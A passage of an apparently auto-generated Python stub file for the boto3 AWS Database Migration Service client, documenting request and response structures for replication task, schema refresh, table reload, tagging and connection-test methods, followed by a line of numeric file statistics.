* Must contain from 1 to 255 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
:type MigrationType: string
:param MigrationType:
The migration type.
Valid values: full-load | cdc | full-load-and-cdc
:type TableMappings: string
:param TableMappings:
When using the AWS CLI or boto3, provide the path of the JSON file that contains the table mappings. Precede the path with "file://". When working with the DMS API, provide the JSON as the parameter value.
For example, --table-mappings file://mappingfile.json
:type ReplicationTaskSettings: string
:param ReplicationTaskSettings:
JSON file that contains settings for the task, such as target metadata settings.
:type CdcStartTime: datetime
:param CdcStartTime:
Indicates the start time for a change data capture (CDC) operation. Use either CdcStartTime or CdcStartPosition to specify when you want a CDC operation to start. Specifying both values results in an error.
Timestamp Example: --cdc-start-time "2018-03-08T12:12:12"
:type CdcStartPosition: string
:param CdcStartPosition:
Indicates when you want a change data capture (CDC) operation to start. Use either CdcStartPosition or CdcStartTime to specify when you want a CDC operation to start. Specifying both values results in an error.
The value can be in date, checkpoint, or LSN/SCN format.
Date Example: --cdc-start-position "2018-03-08T12:12:12"
Checkpoint Example: --cdc-start-position "checkpoint:V1#27#mysql-bin-changelog.157832:1975:-1:2002:677883278264080:mysql-bin-changelog.157832:1876#0#0#*#0#93"
LSN Example: --cdc-start-position "mysql-bin-changelog.000024:373"
:type CdcStopPosition: string
:param CdcStopPosition:
Indicates when you want a change data capture (CDC) operation to stop. The value can be either server time or commit time.
Server time example: --cdc-stop-position "server_time:2018-02-09T12:12:12"
Commit time example: --cdc-stop-position "commit_time:2018-02-09T12:12:12"
:rtype: dict
:returns:
"""
pass
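The identifier constraints listed above (1 to 255 alphanumeric characters or hyphens, first character a letter, no trailing hyphen, no consecutive hyphens) can be checked client-side before calling the API. A minimal sketch; `is_valid_task_identifier` is an illustrative helper, not part of boto3:

```python
import re

# First character a letter; remainder up to 254 alphanumerics or hyphens
# (255 characters total). Illustrative helper, not part of the boto3 API.
_TASK_ID_RE = re.compile(r"^[A-Za-z][A-Za-z0-9-]{0,254}$")

def is_valid_task_identifier(identifier: str) -> bool:
    """Check the documented ReplicationTaskIdentifier constraints."""
    if not _TASK_ID_RE.match(identifier):
        return False
    # Cannot end with a hyphen or contain two consecutive hyphens.
    if identifier.endswith("-") or "--" in identifier:
        return False
    return True
```

Validating locally turns a round-trip API error into an immediate, descriptive failure.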
def reboot_replication_instance(self, ReplicationInstanceArn: str, ForceFailover: bool = None) -> Dict:
"""
Reboots a replication instance. Rebooting results in a momentary outage, until the replication instance becomes available again.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/RebootReplicationInstance>`_
**Request Syntax**
::
response = client.reboot_replication_instance(
ReplicationInstanceArn='string',
ForceFailover=True|False
)
**Response Syntax**
::
{
'ReplicationInstance': {
'ReplicationInstanceIdentifier': 'string',
'ReplicationInstanceClass': 'string',
'ReplicationInstanceStatus': 'string',
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'AvailabilityZone': 'string',
'ReplicationSubnetGroup': {
'ReplicationSubnetGroupIdentifier': 'string',
'ReplicationSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
]
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'ReplicationInstanceClass': 'string',
'AllocatedStorage': 123,
'MultiAZ': True|False,
'EngineVersion': 'string'
},
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'KmsKeyId': 'string',
'ReplicationInstanceArn': 'string',
'ReplicationInstancePublicIpAddress': 'string',
'ReplicationInstancePrivateIpAddress': 'string',
'ReplicationInstancePublicIpAddresses': [
'string',
],
'ReplicationInstancePrivateIpAddresses': [
'string',
],
'PubliclyAccessible': True|False,
'SecondaryAvailabilityZone': 'string',
'FreeUntil': datetime(2015, 1, 1),
'DnsNameServers': 'string'
}
}
**Response Structure**
- *(dict) --*
- **ReplicationInstance** *(dict) --*
The replication instance that is being rebooted.
- **ReplicationInstanceIdentifier** *(string) --*
The replication instance identifier. This parameter is stored as a lowercase string.
Constraints:
* Must contain from 1 to 63 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
Example: ``myrepinstance``
- **ReplicationInstanceClass** *(string) --*
The compute and memory capacity of the replication instance.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
- **ReplicationInstanceStatus** *(string) --*
The status of the replication instance.
- **AllocatedStorage** *(integer) --*
The amount of storage (in gigabytes) that is allocated for the replication instance.
- **InstanceCreateTime** *(datetime) --*
The time the replication instance was created.
- **VpcSecurityGroups** *(list) --*
The VPC security group for the instance.
- *(dict) --*
- **VpcSecurityGroupId** *(string) --*
The VPC security group Id.
- **Status** *(string) --*
The status of the VPC security group.
- **AvailabilityZone** *(string) --*
The Availability Zone for the instance.
- **ReplicationSubnetGroup** *(dict) --*
The subnet group for the replication instance.
- **ReplicationSubnetGroupIdentifier** *(string) --*
The identifier of the replication instance subnet group.
- **ReplicationSubnetGroupDescription** *(string) --*
The description of the replication subnet group.
- **VpcId** *(string) --*
The ID of the VPC.
- **SubnetGroupStatus** *(string) --*
The status of the subnet group.
- **Subnets** *(list) --*
The subnets that are in the subnet group.
- *(dict) --*
- **SubnetIdentifier** *(string) --*
The subnet identifier.
- **SubnetAvailabilityZone** *(dict) --*
The Availability Zone of the subnet.
- **Name** *(string) --*
The name of the Availability Zone.
- **SubnetStatus** *(string) --*
The status of the subnet.
- **PreferredMaintenanceWindow** *(string) --*
The maintenance window times for the replication instance.
- **PendingModifiedValues** *(dict) --*
The pending modification values.
- **ReplicationInstanceClass** *(string) --*
The compute and memory capacity of the replication instance.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
- **AllocatedStorage** *(integer) --*
The amount of storage (in gigabytes) that is allocated for the replication instance.
- **MultiAZ** *(boolean) --*
Specifies if the replication instance is a Multi-AZ deployment. You cannot set the ``AvailabilityZone`` parameter if the Multi-AZ parameter is set to ``true`` .
- **EngineVersion** *(string) --*
The engine version number of the replication instance.
- **MultiAZ** *(boolean) --*
Specifies if the replication instance is a Multi-AZ deployment. You cannot set the ``AvailabilityZone`` parameter if the Multi-AZ parameter is set to ``true`` .
- **EngineVersion** *(string) --*
The engine version number of the replication instance.
- **AutoMinorVersionUpgrade** *(boolean) --*
Boolean value indicating if minor version upgrades will be automatically applied to the instance.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **ReplicationInstancePublicIpAddress** *(string) --*
The public IP address of the replication instance.
- **ReplicationInstancePrivateIpAddress** *(string) --*
The private IP address of the replication instance.
- **ReplicationInstancePublicIpAddresses** *(list) --*
The public IP addresses of the replication instance.
- *(string) --*
- **ReplicationInstancePrivateIpAddresses** *(list) --*
The private IP addresses of the replication instance.
- *(string) --*
- **PubliclyAccessible** *(boolean) --*
Specifies the accessibility options for the replication instance. A value of ``true`` represents an instance with a public IP address. A value of ``false`` represents an instance with a private IP address. The default value is ``true`` .
- **SecondaryAvailabilityZone** *(string) --*
The Availability Zone of the standby replication instance in a Multi-AZ deployment.
- **FreeUntil** *(datetime) --*
The expiration date of the free replication instance that is part of the Free DMS program.
- **DnsNameServers** *(string) --*
The DNS name servers for the replication instance.
:type ReplicationInstanceArn: string
:param ReplicationInstanceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication instance.
:type ForceFailover: boolean
:param ForceFailover:
If this parameter is ``true`` , the reboot is conducted through a Multi-AZ failover. (If the instance isn't configured for Multi-AZ, then you can't specify ``true`` .)
:rtype: dict
:returns:
"""
pass
def refresh_schemas(self, EndpointArn: str, ReplicationInstanceArn: str) -> Dict:
"""
Populates the schema for the specified endpoint. This is an asynchronous operation and can take several minutes. You can check the status of this operation by calling the DescribeRefreshSchemasStatus operation.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/RefreshSchemas>`_
**Request Syntax**
::
response = client.refresh_schemas(
EndpointArn='string',
ReplicationInstanceArn='string'
)
**Response Syntax**
::
{
'RefreshSchemasStatus': {
'EndpointArn': 'string',
'ReplicationInstanceArn': 'string',
'Status': 'successful'|'failed'|'refreshing',
'LastRefreshDate': datetime(2015, 1, 1),
'LastFailureMessage': 'string'
}
}
**Response Structure**
- *(dict) --*
- **RefreshSchemasStatus** *(dict) --*
The status of the refreshed schema.
- **EndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **Status** *(string) --*
The status of the schema.
- **LastRefreshDate** *(datetime) --*
The date the schema was last refreshed.
- **LastFailureMessage** *(string) --*
The last failure message for the schema.
:type EndpointArn: string
:param EndpointArn: **[REQUIRED]**
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
:type ReplicationInstanceArn: string
:param ReplicationInstanceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication instance.
:rtype: dict
:returns:
"""
pass
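Because ``refresh_schemas`` is asynchronous, callers typically poll ``describe_refresh_schemas_status`` until the refresh leaves the ``refreshing`` state. A generic polling sketch with an injected status callable (so it is testable without an AWS connection); in practice ``get_status`` would wrap ``client.describe_refresh_schemas_status(EndpointArn=...)`` and return the ``Status`` field:

```python
import time

def wait_for_refresh(get_status, poll_seconds=5.0, timeout_seconds=600.0,
                     sleep=time.sleep):
    """Poll until a schema refresh leaves the 'refreshing' state.

    get_status: callable returning one of the documented states
    ('successful' | 'failed' | 'refreshing'). The sleep hook is
    injectable for testing. Illustrative helper, not part of boto3.
    """
    waited = 0.0
    while True:
        status = get_status()
        if status != 'refreshing':
            return status  # 'successful' or 'failed'
        if waited >= timeout_seconds:
            raise TimeoutError('schema refresh did not finish in time')
        sleep(poll_seconds)
        waited += poll_seconds
```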
def reload_tables(self, ReplicationTaskArn: str, TablesToReload: List, ReloadOption: str = None) -> Dict:
"""
Reloads the target database table with the source data.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/ReloadTables>`_
**Request Syntax**
::
response = client.reload_tables(
ReplicationTaskArn='string',
TablesToReload=[
{
'SchemaName': 'string',
'TableName': 'string'
},
],
ReloadOption='data-reload'|'validate-only'
)
**Response Syntax**
::
{
'ReplicationTaskArn': 'string'
}
**Response Structure**
- *(dict) --*
- **ReplicationTaskArn** *(string) --*
The Amazon Resource Name (ARN) of the replication task.
:type ReplicationTaskArn: string
:param ReplicationTaskArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication task.
:type TablesToReload: list
:param TablesToReload: **[REQUIRED]**
The names and schemas of the tables to be reloaded.
- *(dict) --*
- **SchemaName** *(string) --*
The schema name of the table to be reloaded.
- **TableName** *(string) --*
The table name of the table to be reloaded.
:type ReloadOption: string
:param ReloadOption:
Options for reload. Specify ``data-reload`` to reload the data and re-validate it if validation is enabled. Specify ``validate-only`` to re-validate the table. This option applies only when validation is enabled for the task.
Valid values: data-reload, validate-only
Default value is data-reload.
:rtype: dict
:returns:
"""
pass
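The ``TablesToReload`` structure can be built from qualified ``schema.table`` strings. A minimal sketch; ``tables_to_reload`` is an illustrative helper (it splits on the first dot, which is sufficient when schema names contain no dots):

```python
def tables_to_reload(qualified_names):
    """Convert 'schema.table' strings into the TablesToReload list
    expected by reload_tables. Illustrative helper, not part of boto3."""
    entries = []
    for name in qualified_names:
        schema, sep, table = name.partition('.')
        if not sep or not schema or not table:
            raise ValueError(f"expected 'schema.table', got {name!r}")
        entries.append({'SchemaName': schema, 'TableName': table})
    return entries
```

The result can be passed directly as the ``TablesToReload`` argument.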
def remove_tags_from_resource(self, ResourceArn: str, TagKeys: List) -> Dict:
"""
Removes metadata tags from a DMS resource.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/RemoveTagsFromResource>`_
**Request Syntax**
::
response = client.remove_tags_from_resource(
ResourceArn='string',
TagKeys=[
'string',
]
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type ResourceArn: string
:param ResourceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the AWS DMS resource the tag is to be removed from.
:type TagKeys: list
:param TagKeys: **[REQUIRED]**
The tag key (name) of the tag to be removed.
- *(string) --*
:rtype: dict
:returns:
"""
pass
def start_replication_task(self, ReplicationTaskArn: str, StartReplicationTaskType: str, CdcStartTime: datetime = None, CdcStartPosition: str = None, CdcStopPosition: str = None) -> Dict:
"""
Starts the replication task.
For more information about AWS DMS tasks, see `Working with Migration Tasks <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Tasks.html>`__ in the *AWS Database Migration Service User Guide.*
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/StartReplicationTask>`_
**Request Syntax**
::
response = client.start_replication_task(
ReplicationTaskArn='string',
StartReplicationTaskType='start-replication'|'resume-processing'|'reload-target',
CdcStartTime=datetime(2015, 1, 1),
CdcStartPosition='string',
CdcStopPosition='string'
)
**Response Syntax**
::
{
'ReplicationTask': {
'ReplicationTaskIdentifier': 'string',
'SourceEndpointArn': 'string',
'TargetEndpointArn': 'string',
'ReplicationInstanceArn': 'string',
'MigrationType': 'full-load'|'cdc'|'full-load-and-cdc',
'TableMappings': 'string',
'ReplicationTaskSettings': 'string',
'Status': 'string',
'LastFailureMessage': 'string',
'StopReason': 'string',
'ReplicationTaskCreationDate': datetime(2015, 1, 1),
'ReplicationTaskStartDate': datetime(2015, 1, 1),
'CdcStartPosition': 'string',
'CdcStopPosition': 'string',
'RecoveryCheckpoint': 'string',
'ReplicationTaskArn': 'string',
'ReplicationTaskStats': {
'FullLoadProgressPercent': 123,
'ElapsedTimeMillis': 123,
'TablesLoaded': 123,
'TablesLoading': 123,
'TablesQueued': 123,
'TablesErrored': 123
}
}
}
**Response Structure**
- *(dict) --*
- **ReplicationTask** *(dict) --*
The replication task started.
- **ReplicationTaskIdentifier** *(string) --*
The user-assigned replication task identifier or name.
Constraints:
* Must contain from 1 to 255 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
- **SourceEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **TargetEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **MigrationType** *(string) --*
The type of migration.
- **TableMappings** *(string) --*
Table mappings specified in the task.
- **ReplicationTaskSettings** *(string) --*
The settings for the replication task.
- **Status** *(string) --*
The status of the replication task.
- **LastFailureMessage** *(string) --*
The last error (failure) message generated for the replication instance.
- **StopReason** *(string) --*
The reason the replication task was stopped.
- **ReplicationTaskCreationDate** *(datetime) --*
The date the replication task was created.
- **ReplicationTaskStartDate** *(datetime) --*
The date the replication task is scheduled to start.
- **CdcStartPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to start. Use either CdcStartPosition or CdcStartTime to specify when you want a CDC operation to start. Specifying both values results in an error.
The value can be in date, checkpoint, or LSN/SCN format.
Date Example: --cdc-start-position "2018-03-08T12:12:12"
Checkpoint Example: --cdc-start-position "checkpoint:V1#27#mysql-bin-changelog.157832:1975:-1:2002:677883278264080:mysql-bin-changelog.157832:1876#0#0#*#0#93"
LSN Example: --cdc-start-position "mysql-bin-changelog.000024:373"
- **CdcStopPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to stop. The value can be either server time or commit time.
Server time example: --cdc-stop-position "server_time:2018-02-09T12:12:12"
Commit time example: --cdc-stop-position "commit_time:2018-02-09T12:12:12"
- **RecoveryCheckpoint** *(string) --*
Indicates the last checkpoint that occurred during a change data capture (CDC) operation. You can provide this value to the ``CdcStartPosition`` parameter to start a CDC operation that begins at that checkpoint.
- **ReplicationTaskArn** *(string) --*
The Amazon Resource Name (ARN) of the replication task.
- **ReplicationTaskStats** *(dict) --*
The statistics for the task, including elapsed time, tables loaded, and table errors.
- **FullLoadProgressPercent** *(integer) --*
The percent complete for the full load migration task.
- **ElapsedTimeMillis** *(integer) --*
The elapsed time of the task, in milliseconds.
- **TablesLoaded** *(integer) --*
The number of tables loaded for this task.
- **TablesLoading** *(integer) --*
The number of tables currently loading for this task.
- **TablesQueued** *(integer) --*
The number of tables queued for this task.
- **TablesErrored** *(integer) --*
The number of errors that have occurred during this task.
:type ReplicationTaskArn: string
:param ReplicationTaskArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication task to be started.
:type StartReplicationTaskType: string
:param StartReplicationTaskType: **[REQUIRED]**
The type of replication task.
:type CdcStartTime: datetime
:param CdcStartTime:
Indicates the start time for a change data capture (CDC) operation. Use either CdcStartTime or CdcStartPosition to specify when you want a CDC operation to start. Specifying both values results in an error.
Timestamp Example: --cdc-start-time "2018-03-08T12:12:12"
:type CdcStartPosition: string
:param CdcStartPosition:
Indicates when you want a change data capture (CDC) operation to start. Use either CdcStartPosition or CdcStartTime to specify when you want a CDC operation to start. Specifying both values results in an error.
The value can be in date, checkpoint, or LSN/SCN format.
Date Example: --cdc-start-position "2018-03-08T12:12:12"
Checkpoint Example: --cdc-start-position "checkpoint:V1#27#mysql-bin-changelog.157832:1975:-1:2002:677883278264080:mysql-bin-changelog.157832:1876#0#0#*#0#93"
LSN Example: --cdc-start-position "mysql-bin-changelog.000024:373"
:type CdcStopPosition: string
:param CdcStopPosition:
Indicates when you want a change data capture (CDC) operation to stop. The value can be either server time or commit time.
Server time example: --cdc-stop-position "server_time:2018-02-09T12:12:12"
Commit time example: --cdc-stop-position "commit_time:2018-02-09T12:12:12"
:rtype: dict
:returns:
"""
pass
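Since ``CdcStartTime`` and ``CdcStartPosition`` are mutually exclusive (specifying both results in an error), the optional CDC arguments can be assembled defensively before the call. A sketch; ``start_task_kwargs`` is an illustrative helper, not part of boto3:

```python
def start_task_kwargs(task_arn, start_type='start-replication',
                      cdc_start_time=None, cdc_start_position=None,
                      cdc_stop_position=None):
    """Build keyword arguments for start_replication_task, enforcing the
    documented rule that CdcStartTime and CdcStartPosition are mutually
    exclusive. Illustrative helper, not part of boto3."""
    if cdc_start_time is not None and cdc_start_position is not None:
        raise ValueError('specify either CdcStartTime or CdcStartPosition, not both')
    kwargs = {'ReplicationTaskArn': task_arn,
              'StartReplicationTaskType': start_type}
    # Only include the optional CDC parameters that were actually given.
    if cdc_start_time is not None:
        kwargs['CdcStartTime'] = cdc_start_time
    if cdc_start_position is not None:
        kwargs['CdcStartPosition'] = cdc_start_position
    if cdc_stop_position is not None:
        kwargs['CdcStopPosition'] = cdc_stop_position
    return kwargs
```

The result would be unpacked as ``client.start_replication_task(**kwargs)``.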
def start_replication_task_assessment(self, ReplicationTaskArn: str) -> Dict:
"""
Starts the replication task assessment for unsupported data types in the source database.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/StartReplicationTaskAssessment>`_
**Request Syntax**
::
response = client.start_replication_task_assessment(
ReplicationTaskArn='string'
)
**Response Syntax**
::
{
'ReplicationTask': {
'ReplicationTaskIdentifier': 'string',
'SourceEndpointArn': 'string',
'TargetEndpointArn': 'string',
'ReplicationInstanceArn': 'string',
'MigrationType': 'full-load'|'cdc'|'full-load-and-cdc',
'TableMappings': 'string',
'ReplicationTaskSettings': 'string',
'Status': 'string',
'LastFailureMessage': 'string',
'StopReason': 'string',
'ReplicationTaskCreationDate': datetime(2015, 1, 1),
'ReplicationTaskStartDate': datetime(2015, 1, 1),
'CdcStartPosition': 'string',
'CdcStopPosition': 'string',
'RecoveryCheckpoint': 'string',
'ReplicationTaskArn': 'string',
'ReplicationTaskStats': {
'FullLoadProgressPercent': 123,
'ElapsedTimeMillis': 123,
'TablesLoaded': 123,
'TablesLoading': 123,
'TablesQueued': 123,
'TablesErrored': 123
}
}
}
**Response Structure**
- *(dict) --*
- **ReplicationTask** *(dict) --*
The assessed replication task.
- **ReplicationTaskIdentifier** *(string) --*
The user-assigned replication task identifier or name.
Constraints:
* Must contain from 1 to 255 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
- **SourceEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **TargetEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **MigrationType** *(string) --*
The type of migration.
- **TableMappings** *(string) --*
Table mappings specified in the task.
- **ReplicationTaskSettings** *(string) --*
The settings for the replication task.
- **Status** *(string) --*
The status of the replication task.
- **LastFailureMessage** *(string) --*
The last error (failure) message generated for the replication instance.
- **StopReason** *(string) --*
The reason the replication task was stopped.
- **ReplicationTaskCreationDate** *(datetime) --*
The date the replication task was created.
- **ReplicationTaskStartDate** *(datetime) --*
The date the replication task is scheduled to start.
- **CdcStartPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to start. Use either CdcStartPosition or CdcStartTime to specify when you want a CDC operation to start. Specifying both values results in an error.
The value can be in date, checkpoint, or LSN/SCN format.
Date Example: --cdc-start-position "2018-03-08T12:12:12"
Checkpoint Example: --cdc-start-position "checkpoint:V1#27#mysql-bin-changelog.157832:1975:-1:2002:677883278264080:mysql-bin-changelog.157832:1876#0#0#*#0#93"
LSN Example: --cdc-start-position "mysql-bin-changelog.000024:373"
- **CdcStopPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to stop. The value can be either server time or commit time.
Server time example: --cdc-stop-position "server_time:2018-02-09T12:12:12"
Commit time example: --cdc-stop-position "commit_time:2018-02-09T12:12:12"
- **RecoveryCheckpoint** *(string) --*
Indicates the last checkpoint that occurred during a change data capture (CDC) operation. You can provide this value to the ``CdcStartPosition`` parameter to start a CDC operation that begins at that checkpoint.
- **ReplicationTaskArn** *(string) --*
The Amazon Resource Name (ARN) of the replication task.
- **ReplicationTaskStats** *(dict) --*
The statistics for the task, including elapsed time, tables loaded, and table errors.
- **FullLoadProgressPercent** *(integer) --*
The percent complete for the full load migration task.
- **ElapsedTimeMillis** *(integer) --*
The elapsed time of the task, in milliseconds.
- **TablesLoaded** *(integer) --*
The number of tables loaded for this task.
- **TablesLoading** *(integer) --*
The number of tables currently loading for this task.
- **TablesQueued** *(integer) --*
The number of tables queued for this task.
- **TablesErrored** *(integer) --*
The number of errors that have occurred during this task.
:type ReplicationTaskArn: string
:param ReplicationTaskArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication task.
:rtype: dict
:returns:
"""
pass
def stop_replication_task(self, ReplicationTaskArn: str) -> Dict:
"""
Stops the replication task.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/StopReplicationTask>`_
**Request Syntax**
::
response = client.stop_replication_task(
ReplicationTaskArn='string'
)
**Response Syntax**
::
{
'ReplicationTask': {
'ReplicationTaskIdentifier': 'string',
'SourceEndpointArn': 'string',
'TargetEndpointArn': 'string',
'ReplicationInstanceArn': 'string',
'MigrationType': 'full-load'|'cdc'|'full-load-and-cdc',
'TableMappings': 'string',
'ReplicationTaskSettings': 'string',
'Status': 'string',
'LastFailureMessage': 'string',
'StopReason': 'string',
'ReplicationTaskCreationDate': datetime(2015, 1, 1),
'ReplicationTaskStartDate': datetime(2015, 1, 1),
'CdcStartPosition': 'string',
'CdcStopPosition': 'string',
'RecoveryCheckpoint': 'string',
'ReplicationTaskArn': 'string',
'ReplicationTaskStats': {
'FullLoadProgressPercent': 123,
'ElapsedTimeMillis': 123,
'TablesLoaded': 123,
'TablesLoading': 123,
'TablesQueued': 123,
'TablesErrored': 123
}
}
}
**Response Structure**
- *(dict) --*
- **ReplicationTask** *(dict) --*
The replication task stopped.
- **ReplicationTaskIdentifier** *(string) --*
The user-assigned replication task identifier or name.
Constraints:
* Must contain from 1 to 255 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
- **SourceEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **TargetEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **MigrationType** *(string) --*
The type of migration.
- **TableMappings** *(string) --*
Table mappings specified in the task.
- **ReplicationTaskSettings** *(string) --*
The settings for the replication task.
- **Status** *(string) --*
The status of the replication task.
- **LastFailureMessage** *(string) --*
The last error (failure) message generated for the replication instance.
- **StopReason** *(string) --*
The reason the replication task was stopped.
- **ReplicationTaskCreationDate** *(datetime) --*
The date the replication task was created.
- **ReplicationTaskStartDate** *(datetime) --*
The date the replication task is scheduled to start.
- **CdcStartPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to start. Use either CdcStartPosition or CdcStartTime to specify when you want a CDC operation to start. Specifying both values results in an error.
The value can be in date, checkpoint, or LSN/SCN format.
Date Example: --cdc-start-position "2018-03-08T12:12:12"
Checkpoint Example: --cdc-start-position "checkpoint:V1#27#mysql-bin-changelog.157832:1975:-1:2002:677883278264080:mysql-bin-changelog.157832:1876#0#0#*#0#93"
LSN Example: --cdc-start-position "mysql-bin-changelog.000024:373"
- **CdcStopPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to stop. The value can be either server time or commit time.
Server time example: --cdc-stop-position "server_time:2018-02-09T12:12:12"
Commit time example: --cdc-stop-position "commit_time:2018-02-09T12:12:12"
- **RecoveryCheckpoint** *(string) --*
Indicates the last checkpoint that occurred during a change data capture (CDC) operation. You can provide this value to the ``CdcStartPosition`` parameter to start a CDC operation that begins at that checkpoint.
- **ReplicationTaskArn** *(string) --*
The Amazon Resource Name (ARN) of the replication task.
- **ReplicationTaskStats** *(dict) --*
The statistics for the task, including elapsed time, tables loaded, and table errors.
- **FullLoadProgressPercent** *(integer) --*
The percent complete for the full load migration task.
- **ElapsedTimeMillis** *(integer) --*
The elapsed time of the task, in milliseconds.
- **TablesLoaded** *(integer) --*
The number of tables loaded for this task.
- **TablesLoading** *(integer) --*
The number of tables currently loading for this task.
- **TablesQueued** *(integer) --*
The number of tables queued for this task.
- **TablesErrored** *(integer) --*
The number of errors that have occurred during this task.
:type ReplicationTaskArn: string
:param ReplicationTaskArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication task to be stopped.
:rtype: dict
:returns:
"""
pass
def test_connection(self, ReplicationInstanceArn: str, EndpointArn: str) -> Dict:
"""
Tests the connection between the replication instance and the endpoint.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/TestConnection>`_
**Request Syntax**
::
response = client.test_connection(
ReplicationInstanceArn='string',
EndpointArn='string'
)
**Response Syntax**
::
{
'Connection': {
'ReplicationInstanceArn': 'string',
'EndpointArn': 'string',
'Status': 'string',
'LastFailureMessage': 'string',
'EndpointIdentifier': 'string',
'ReplicationInstanceIdentifier': 'string'
}
}
**Response Structure**
- *(dict) --*
- **Connection** *(dict) --*
The connection tested.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **EndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **Status** *(string) --*
The connection status.
- **LastFailureMessage** *(string) --*
The error message when the connection last failed.
- **EndpointIdentifier** *(string) --*
The identifier of the endpoint. Identifiers must begin with a letter; must contain only ASCII letters, digits, and hyphens; and must not end with a hyphen or contain two consecutive hyphens.
- **ReplicationInstanceIdentifier** *(string) --*
The replication instance identifier. This parameter is stored as a lowercase string.
:type ReplicationInstanceArn: string
:param ReplicationInstanceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication instance.
:type EndpointArn: string
:param EndpointArn: **[REQUIRED]**
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
:rtype: dict
:returns:
"""
pass
| 61.786486 | 836 | 0.559055 | 36,508 | 377,639 | 5.767804 | 0.032787 | 0.023636 | 0.020791 | 0.012865 | 0.906872 | 0.889757 | 0.876241 | 0.870837 | 0.8652 | 0.859439 | 0 | 0.013972 | 0.345213 | 377,639 | 6,111 | 837 | 61.796596 | 0.837544 | 0.891425 | 0 | 0.458716 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.458716 | false | 0.477064 | 0.082569 | 0 | 0.550459 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 10 |
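The identifier constraints listed in the `stop_replication_task` docstring above (1 to 255 alphanumeric characters or hyphens, first character a letter, no trailing hyphen, no consecutive hyphens) can be checked client-side before making the API call. A minimal sketch — the helper name and regex are ours, not part of the boto3 API:

```python
import re

# Pattern encoding the documented constraints:
#   - first character must be a letter
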